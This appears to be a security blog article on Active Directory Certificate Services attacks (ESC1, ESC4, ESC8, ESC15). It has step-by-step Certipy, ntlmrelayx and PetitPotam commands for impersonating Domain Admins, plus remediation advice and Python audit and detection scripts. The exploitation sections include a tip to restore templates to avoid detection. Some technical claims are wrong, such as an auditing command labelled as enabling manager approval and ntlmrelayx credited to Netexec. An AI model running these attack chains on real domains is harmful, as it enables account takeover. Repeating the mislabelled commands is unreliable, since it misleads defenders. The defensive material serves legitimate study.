Introduction:
Active Directory Certificate Services (ADCS) is Microsoft’s PKI backbone for authentication, encryption, and digital signatures in Windows domains. However, misconfigured certificate templates and lax authorization policies turn ADCS into a silent privilege escalation highway, allowing low-privileged users to impersonate Domain Admins. This article dissects real-world ADCS attacks (ESC1, ESC4, ESC8, ESC15) and provides step-by-step exploitation and hardening commands based on the latest offensive security research.
Learning Objectives:
- Identify and exploit the four most dangerous ADCS misconfigurations (ESC1, ESC4, ESC8, ESC15) using Certipy and Netexec.
- Build a vulnerable ADCS lab to safely practice certificate template abuse and NTLM relay attacks.
- Apply remediation techniques, including template hardening, access control fixes, and HTTP-based enrollment protections.
You Should Know:
1. Setting Up an ADCS Attack Lab: From Zero to Vulnerable
A controlled lab is essential for testing ADCS exploits. You need a Kali Linux attacker machine and a Windows Server with Active Directory and ADCS installed.
Step‑by‑step guide:
- Deploy Windows Server 2022 – Install AD DS (Domain Controller) and promote it to a domain, e.g., lab.local.
- Install ADCS – On the DC, add the Active Directory Certificate Services role with Certification Authority (CA) and Web Enrollment. Run in PowerShell as Administrator:
Install-WindowsFeature Adcs-Cert-Authority -IncludeManagementTools
Install-AdcsCertificationAuthority -CAType EnterpriseRootCA -CommonName "LAB-CA" -HashAlgorithm SHA256 -Force
Install-WindowsFeature Adcs-Web-Enrollment -IncludeManagementTools
Install-AdcsWebEnrollment -Force
- Create vulnerable templates – Duplicate the “User” template, enable “Supply in the request” for ESC1, and set low enrollment rights for ESC4 later.
- Configure Kali – Install Certipy and Netexec:
sudo apt install python3-pip
pip3 install certipy-ad
pip3 install netexec
- Validate connectivity – Ensure Kali can resolve the domain controller (e.g., dc.lab.local).
2. ESC1 – Enrollee‑Supplied Subject Abuse (Domain Admin by Template)
ESC1 occurs when a certificate template allows client authentication and the requester can specify an arbitrary Subject Alternative Name (SAN), effectively impersonating any user.
Step‑by‑step exploitation:
- Enumerate vulnerable templates using Certipy:
certipy find -u lowuser -p 'pass123' -dc-ip 192.168.1.10 -dc-only
Look for templates with `Client Authentication` EKU, `Enrollee Supplies Subject` enabled, and low enrollment privileges.
- Request a certificate for a privileged account (e.g., Administrator):
certipy req -u lowuser -p 'pass123' -target dc.lab.local -ca LAB-CA -template VULN_TEMPLATE -upn administrator@lab.local
- Convert and authenticate – Use the obtained certificate to retrieve the NT hash or authenticate via Kerberos:
certipy auth -pfx administrator.pfx -dc-ip 192.168.1.10
→ The command returns the NTLM hash of the impersonated user.
- Escalate: Use `psexec` or `wmiexec` with the hash for full domain compromise.
Remediation:
- Disable “Supply in the request” on all client authentication templates.
- Require manager approval or set `CA certificate manager approval` for high-value templates.
3. ESC4 – Template Hijacking (Re‑Abusing Write Permissions)
ESC4 exploits weak ACLs allowing a low-privileged user to modify a certificate template and then abuse it like ESC1.
Step‑by‑step guide:
- Identify writable templates – After running certipy find, check for templates where your user has `Write` or `Full Control`:
certipy find -u lowuser -p 'pass123' -dc-ip 192.168.1.10 -stdout
- Modify the template – Add the `ENROLLEE_SUPPLIES_SUBJECT` flag and enable client authentication:
certipy template -u lowuser -p 'pass123' -dc-ip 192.168.1.10 -template VULN_TEMPLATE -save-old -set ENROLLEE_SUPPLIES_SUBJECT=1 -set ClientAuthentication=1
- Exploit as ESC1 – Request a certificate for Domain Admin and authenticate.
- Restore the original template after the exercise to avoid detection.
Remediation:
- Audit template ACLs regularly. Only CA administrators should have write access.
- Use `dsacls` to check permissions:
dsacls "CN=TemplateName,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local"
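The ESC1 and ESC4 checks described in the two sections above (enrollee-supplied subject plus an authentication EKU and low-privileged enrollment rights; write access on the template object for low-privileged principals) can be reproduced offline against an export of the template objects. The following is an added example, not Certipy's or Microsoft's code: the template records are constructed inline, the flag bits and attribute names are the real AD schema values (msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, pKIExtendedKeyUsage, msPKI-RA-Signature), and the `enroll`/`write` sets stand in for the principals a real collector would resolve from the template's security descriptor.

```python
"""Offline audit of certificate-template attributes for the ESC1 and ESC4
conditions.  Added example: evaluates template records (constructed here;
in practice exported from the Configuration partition over LDAP) and reports
which ones a low-privileged principal could enroll in with a self-chosen
SAN (ESC1) or rewrite outright (ESC4)."""
from dataclasses import dataclass

# Flag bits of the AD schema attributes msPKI-Certificate-Name-Flag and
# msPKI-Enrollment-Flag.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # "Supply in the request"
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # "CA certificate manager approval"

# EKU OIDs that make an issued certificate usable for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

# Groups every domain principal belongs to; rights granted to them are
# effectively granted to any account in the domain.
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers",
                       "Authenticated Users", "Everyone"}


@dataclass(frozen=True)
class Template:
    name: str
    name_flag: int          # msPKI-Certificate-Name-Flag
    enrollment_flag: int    # msPKI-Enrollment-Flag
    ekus: tuple             # pKIExtendedKeyUsage (empty = no EKU restriction)
    ra_signatures: int      # msPKI-RA-Signature (authorized signatures required)
    enroll: frozenset       # principals holding the Enroll right
    write: frozenset        # principals holding WriteDacl/WriteOwner/WriteProperty


def usable_for_auth(t: Template) -> bool:
    """A template with no EKU at all is treated as any-purpose by ADCS."""
    return not t.ekus or bool(AUTH_EKUS.intersection(t.ekus))


def low_priv(principals: frozenset) -> list:
    """Low-privileged groups among the given principals, sorted for stable output."""
    return sorted(principals & LOW_PRIV_PRINCIPALS)


def audit(t: Template) -> list:
    findings = []
    # ESC1: enrollee picks the subject/SAN, the cert can authenticate, no
    # approval or signature gate is in the way, and low-priv can enroll.
    if (t.name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
            and usable_for_auth(t)
            and not t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS
            and t.ra_signatures == 0
            and low_priv(t.enroll)):
        findings.append(f"ESC1 {t.name}: {low_priv(t.enroll)} can enroll with a self-chosen SAN")
    # ESC4: a low-priv principal can rewrite the template object itself and
    # turn it into an ESC1 template.
    if low_priv(t.write):
        findings.append(f"ESC4 {t.name}: writable by {low_priv(t.write)}")
    return findings


# Constructed sample export (not real data): the lab's duplicated "User"
# template, a hardened copy, and a server template with a sloppy ACL.
SAMPLE_TEMPLATES = (
    Template("VULN_TEMPLATE", 0x1, 0x0, ("1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"), 0,
             frozenset({"Domain Users", "Domain Admins"}), frozenset({"Domain Admins"})),
    Template("User-Hardened", 0x0, 0x2, ("1.3.6.1.5.5.7.3.2",), 0,
             frozenset({"Domain Users"}), frozenset({"Domain Admins"})),
    Template("WebServer-Copy", 0x1, 0x0, ("1.3.6.1.5.5.7.3.1",), 0,
             frozenset({"Domain Computers"}), frozenset({"Authenticated Users", "Domain Admins"})),
)


def audit_all(templates=SAMPLE_TEMPLATES) -> dict:
    """Map template name -> list of findings (an empty list means clean)."""
    return {t.name: audit(t) for t in templates}


if __name__ == "__main__":
    for name, findings in audit_all().items():
        print(name, "->", findings or "clean")
```

Note that `WebServer-Copy` is not reported as ESC1 even though it has "Supply in the request" set, because its only EKU is Server Authentication; it is still reported as ESC4, since anyone in Authenticated Users could add a client-authentication EKU to it. Clearing CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT or setting CT_FLAG_PEND_ALL_REQUESTS on `VULN_TEMPLATE` is exactly the remediation the ESC1 section prescribes, and the audit goes clean for it once either is done.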
4. ESC8 – NTLM Relay to ADCS Web Enrollment
ESC8 targets HTTP‑based enrollment endpoints. An attacker coerces a machine account to authenticate via NTLM and relays that authentication to the ADCS web interface to enroll a certificate for that machine.
Step‑by‑step guide:
- Start a relay listener with Netexec’s ntlmrelayx:
sudo ntlmrelayx.py -t http://dc.lab.local/certsrv/certfnsh.asp -smb2support --adcs
- Coerce authentication from a target machine (e.g., a domain-joined workstation) using a printer bug or PetitPotam:
python3 PetitPotam.py -d lab.local -u lowuser -p 'pass123' attacker_ip target_ip
- The relay listener captures the NTLM hash and automatically requests a certificate for the victim machine.
- Use the certificate to authenticate via Kerberos (S4U2Self) or to obtain the machine account’s NTLM hash:
certipy auth -pfx machine.pfx -dc-ip 192.168.1.10
- Result: Compromise of the machine account, often used to pivot or dump domain credentials.
Remediation:
- Disable NTLM on ADCS web enrollment servers (use Kerberos only).
- Enable HTTP to HTTPS redirection and Extended Protection for Authentication.
- Apply the patch for CVE-2024-49019 (see ESC15) and enforce SMB signing.
5. ESC15 – Arbitrary Application Policy Injection in V1 Templates (CVE‑2024‑49019)
This recent vulnerability allows attackers to inject arbitrary application policies into legacy V1 certificate templates, effectively bypassing EKU restrictions and escalating privileges.
Step‑by‑step exploitation:
- Identify a V1 template (Schema version 1) that allows enrollment for low-privileged users.
- Use Certipy’s ESC15 module (if available; otherwise, a custom script) to add the `Client Authentication` EKU policy:
certipy template -u lowuser -p 'pass123' -dc-ip 192.168.1.10 -template V1_TEMPLATE -set 'ApplicationPolicies'=1.3.6.1.5.5.7.3.2
- Enroll a certificate after the injection:
certipy req -u lowuser -p 'pass123' -target dc.lab.local -ca LAB-CA -template V1_TEMPLATE -upn administrator@lab.local
- Authenticate using the obtained certificate to gain Domain Admin access.
Remediation:
- Apply Microsoft’s security update (CVE-2024-49019) on all ADCS servers.
- Migrate all V1 templates to V2 or higher. Disable any legacy templates not in use.
- Monitor for `4662` (ACL modifications) and `4887` (certificate template changes) in Windows event logs.
6. Hardening ADCS – Commands and Best Practices
Proactive hardening blocks most ESC attacks. Deploy these measures immediately.
Windows hardening commands:
- List all certificate templates and their security descriptors:
certutil -v -template | Select-String -Pattern "Template Name|CN=" -Context 0,5
- Remove dangerous permissions – Use `certutil` or ADSI Edit to delete `Enroll` rights from low-privileged groups on sensitive templates.
- Disable HTTP‑based enrollment endpoints:
Remove-WebSite -Name "CertSrv"
- Enable CA certificate manager approval for all client authentication templates:
certutil -setreg CA\AuditFilter 127
- Apply the patch for CVE-2024-49019 and reboot.
Linux/Kali detection commands:
- Scan for ESC1/ESC4 templates remotely:
certipy find -u lowuser -p 'pass123' -dc-ip 192.168.1.10 -vulnerable
- Check for NTLM relay exposure – Use Netexec to test web enrollment endpoints:
nxc http https://dc.lab.local/certsrv/ -k
7. Continuous Monitoring & Incident Response
Even after hardening, monitor for certificate abuse.
Step‑by‑step detection:
- Enable ADCS auditing (Group Policy → Advanced Audit Policy → Audit Certification Services).
- Monitor Event IDs: 4886–4890 for certificate requests, 4887 for template changes, and 4768/4769 for Kerberos TGT/TGS anomalies.
- Use Splunk or Elastic with this Sigma rule for ESC1-like activity:
selection:
  EventID: 4886
  Subject: "Enrollee Supplies Subject"
  RequestAttributes: "SAN"
- Automated response – Block the source IP and revoke any suspicious certificates using certutil -revoke <serial>.
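The detection steps above, together with the ESC15 remediation's advice to watch 4662 and 4887, come down to two correlations: an issued certificate (4887) whose SAN names an account other than the requester, and a write to a certificate template object (4662, object type pKICertificateTemplate) by an account that is not a template administrator. The following is an added example of that logic, not a product rule or code from the original post: the event records are constructed, the `san` field is assumed to have been extracted from the issued certificate by the collector (the raw 4887 event does not carry the SAN as a separate field), and `TEMPLATE_ADMINS` is a constructed allow-list.

```python
"""Detection pass over constructed CA (4887) and directory (4662) audit
events.  Added example: flags certificates issued for an identity other
than the requester and template-object writes by non-administrators."""
import re
from typing import Optional

TEMPLATE_CONTAINER = ("CN=Certificate Templates,CN=Public Key Services,"
                      "CN=Services,CN=Configuration,")

# Constructed allow-list: accounts expected to edit templates.
TEMPLATE_ADMINS = {"caadmin"}

# Constructed sample events (not real logs).  4887 carries Requester and the
# request Attributes; `san` is assumed to be added by the collector.
SAMPLE_EVENTS = [
    {"EventID": 4887, "Requester": "LAB\\lowuser",
     "Attributes": "CertificateTemplate:VULN_TEMPLATE",
     "san": "upn=administrator@lab.local"},
    {"EventID": 4887, "Requester": "LAB\\jdoe",
     "Attributes": "CertificateTemplate:User",
     "san": "upn=jdoe@lab.local"},
    {"EventID": 4887, "Requester": "LAB\\WS01$",
     "Attributes": "CertificateTemplate:Machine",
     "san": "dns=ws01.lab.local"},
    {"EventID": 4662, "SubjectUserName": "lowuser", "ObjectType": "pKICertificateTemplate",
     "ObjectName": "CN=VULN_TEMPLATE," + TEMPLATE_CONTAINER + "DC=lab,DC=local",
     "Accesses": "Write Property"},
    {"EventID": 4662, "SubjectUserName": "caadmin", "ObjectType": "pKICertificateTemplate",
     "ObjectName": "CN=User," + TEMPLATE_CONTAINER + "DC=lab,DC=local",
     "Accesses": "Write Property"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "pKICertificateTemplate",
     "ObjectName": "CN=User," + TEMPLATE_CONTAINER + "DC=lab,DC=local",
     "Accesses": "Read Property"},
]


def requester_account(requester: str) -> str:
    """'LAB\\lowuser' -> 'lowuser'; machine accounts keep their trailing '$'."""
    return requester.split("\\", 1)[-1].lower()


def san_account(san: str) -> Optional[str]:
    """Reduce a SAN value to the sAMAccountName it implies, or None if unknown."""
    m = re.match(r"upn=([^@]+)@", san, re.I)
    if m:
        return m.group(1).lower()
    m = re.match(r"dns=([^.]+)", san, re.I)
    if m:
        return m.group(1).lower() + "$"   # a host SAN maps to the machine account
    return None


def template_from_attributes(attrs: str) -> str:
    m = re.search(r"CertificateTemplate:(\S+)", attrs)
    return m.group(1) if m else "<unknown>"


def check_issued(ev: dict) -> Optional[str]:
    """4887: alert when the SAN identity differs from the requesting account."""
    who = requester_account(ev["Requester"])
    target = san_account(ev.get("san", ""))
    if target is not None and target != who:
        return (f"ESC1-style issuance: {ev['Requester']} obtained a certificate for "
                f"'{target}' via template {template_from_attributes(ev.get('Attributes', ''))}")
    return None


def check_object_access(ev: dict) -> Optional[str]:
    """4662: alert on write access to a template object by a non-admin."""
    if ev.get("ObjectType") != "pKICertificateTemplate":
        return None
    if "write" not in ev.get("Accesses", "").lower():
        return None
    if ev["SubjectUserName"].lower() in TEMPLATE_ADMINS:
        return None
    return f"Template modified by non-admin {ev['SubjectUserName']}: {ev['ObjectName']}"


def detect(events=SAMPLE_EVENTS) -> list:
    """Return alert strings, in event order."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 4887:
            hit = check_issued(ev)
        elif ev["EventID"] == 4662:
            hit = check_object_access(ev)
        else:
            hit = None
        if hit:
            alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in detect():
        print(alert)
```

The requester-versus-SAN comparison is what separates an ESC1 abuse from ordinary enrollment: a user requesting a certificate for their own UPN, or a workstation requesting one for its own hostname, produces no alert, while `lowuser` obtaining a certificate that names `administrator` does. Both 4662 and 4887 only exist if the auditing from the first detection step is switched on, so the check is only as good as the audit policy behind it.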
What Undercode Say:
- Key Takeaway 1: ADCS misconfigurations are among the most impactful privilege escalation vectors in Windows domains – they are silent, often unmonitored, and can yield Domain Admin within minutes.
- Key Takeaway 2: Tools like Certipy and Netexec have automated complex ESC attacks, making it essential for defenders to actively audit templates, enforce CA manager approval, and disable NTLM on enrollment endpoints.
Analysis: The ADCS attack surface remains widely underestimated. While Microsoft has patched specific CVEs (like ESC15), the underlying design issues – overly permissive templates, writable ACLs, and legacy HTTP endpoints – persist in thousands of enterprises. Offensive security teams must transition from point-in-time pentesting to continuous ADCS validation, integrating `certipy find` into weekly CI/CD pipelines for Active Directory. Defenders, in turn, need to treat ADCS as a Tier‑0 asset, applying the same rigorous controls as Domain Controllers. The coming years will see more attacks on PKI trust chains, including AI‑driven certificate abuse and cross‑forest relay techniques.
Prediction:
As Microsoft pushes passwordless authentication, ADCS will become an even juicier target. Attackers will shift from Kerberoasting to certificate‑based persistence, and we will see widespread exploitation of misconfigured cloud‑integrated CAs (e.g., with Azure AD). Defenders will adopt “Certificate Threat Hunting” as a dedicated discipline, and automated remediation platforms will emerge to instantly revoke suspicious certificates. The ESC playbook will expand beyond ESC20, likely targeting hybrid PKI and hardware security module misconfigurations.
Reported By: Cylum Academy – Hackers Feeds